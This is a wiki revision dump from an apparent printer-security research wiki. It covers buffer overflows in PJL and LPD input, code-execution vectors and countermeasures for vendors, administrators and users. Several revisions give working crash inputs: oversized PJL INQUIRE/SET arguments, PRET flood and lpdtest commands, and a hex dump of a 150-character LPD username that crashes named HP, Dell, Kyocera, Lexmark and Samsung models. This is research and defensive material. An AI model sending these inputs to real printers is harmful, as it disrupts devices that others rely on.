[[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. === How to test this attack? === A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. === Who can perform this attack? === Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- b4a2d7f70731d15a3bb2f08ca78bfa2cfd64b9a3 109 65 2017-01-14T17:33:35Z 134.147.128.156 0 /* How to test this attack? */ wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… === How to test this attack? === Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" === Who can perform this attack? === Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. === How to test this attack? === A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. === Who can perform this attack? === Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- a2be31b24fdf3aea2aeb3bab25225bd38d789434 65 56 2017-01-08T15:41:34Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… === How to test this attack? === Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" === Who can perform this attack? === Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. === How to test this attack? === A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. === Who can perform this attack? === Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- 6b9de1978b6f25c90f32370663e432b90c2a3b33 56 2017-01-06T13:51:39Z 134.147.198.125 0 Created page with "While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Pro..." wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… === How to test this attack? === Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" === Who can perform this attack? === Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. === How to test this attack? === A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. === Who can perform this attack? === Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). 5727163be0559930ccfa2ed663d217b4da1ad2bd 0 39 160 152 2017-01-15T17:22:19Z 92.227.58.56 0 wikitext text/x-wiki Any computer system may be prone to malicious code execution. Printers are no exception. While there are numerous potential attack vectors, two standard ways of importing foreign code are present in most of today's printers and MFPs by design: the ability to perform firmware updates and to install additional software packages. Furthermote, a short introduction to the danger of buffer overflows in embedded devices is given. ''Currently, the following techniques to achieve code execution are discussed in this wiki:'' * [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input * [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs * [[Software packages]] – Installing custom software on MFPs and printer devices 53ebc82462ce5d052a875da68e743b4410f16bb3 152 148 2017-01-15T16:37:00Z 92.227.58.56 0 wikitext text/x-wiki ''Currently, the following techniques to achieve code execution are discussed in this wiki:'' * [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input * [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs * [[Software packages]] – Installing custom software on MFPs and printer devices b04c9c05df9be652e9268b879ce64f0c07921d5e 148 2017-01-15T16:34:52Z 92.227.58.56 0 Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] i..." wikitext text/x-wiki ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input * [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs * [[Software packages]] – Installing custom software on MFPs and printer devices 65ba545e816f5b2575bb3147bd5921afdf07fa99 0 9 615 614 2017-03-24T10:52:13Z Admin 1 /* Admins */ wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Most attacks are based on malicious print jobs. If the device supports authentication, it therefore should be configured to accept print jobs from authorized personnel only. Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- 284fbd40e8c4f5ae6f239cb9e465553e976f4434 614 310 2017-03-24T10:51:38Z Admin 1 /* Admins */ wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Most attacks are based on malicious print jobs. If the device supports authentication, it therefore should be configured to accept print jobs from authorized personnel only. Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- 1e9da8a09a22023536565f41a3eac246059e5034 310 268 2017-01-31T08:25:20Z 84.153.135.37 0 /* Vendors */ wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security. When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to run vendor software <ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. An example has been given by <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended HP LaserJets to support load-balancing. The [https://en.wikipedia.org/wiki/OpenWrt OpenWrt] success story demonstrated how to improve the often limited functionality of embedded devices and there is no valid reason why printers should be excluded from the benefits of free software. Vendors should therefore take secure alternatives to code signing into account. For example the window of vulnerability can be limited to a local attacker if firmware updates required a confirmation key pressed on the printer's control panel. Further non-code signing based approaches like unique default passwords can be adapted from best practices in the world of home routers. == Admins == Network administrators should never leave their printers accessible from the Internet and disable raw port 9100/tcp printing if not required. While this does not prevent most of the presented attacks, it complicates them and in particular mitigates the attackers ability to leak data. A more secure but also more expensive approach is to completely sandbox all printing devices into a separate [https://en.wikipedia.org/wiki/Virtual_LAN VLAN], only accessible by a hardened print server. The print server should completely ignore PJL commands and convert PostScript code to another page description language or to a ‘defused’ version using CUPS' ''ps2write'' filter and disallow access to raw print queues. Printers should be completely sandboxed, isolating them from the rest of the network to mitigate the harm in case they are rooted. It must however be noted that print servers themselves can be a target of attacks, for example using the techniques discussed in [[Beyond Printers]]. A schematic view of the VLAN sandboxing approach is given below: [[File:Dedicated-print-server.png|600px|Dedicated print server as a countermeasures to sandbox printers]] Furthermore, if supported by the device, strong passwords should be set for PostScript ''startjob'' and system parameters, PJL disk lock and control panel lock as well as the embedded web server. Additionally, malicious PJL commands can be blocked using an [https://en.wikipedia.org/wiki/Intrusion_detection_system IDS/IPS]. Note however that such signature-based approaches are doomed to fail for PostScript which offers various code obfuscation techniques. == Users == Employees should be trained to never leave the copy room unlocked and report suspicious printouts like [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] headers to the administrator as they may be traces of a [[cross-site printing]] attack. All other dispensable hard copies should be shred, even if they apparently do not contain confidential data. ---- 69fe9e899e17b46131d900a8331812ac89a4cc39 268 139 2017-01-28T15:28:54Z Admin 1 wikitext text/x-wiki Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design. Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks. == Vendors == Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone 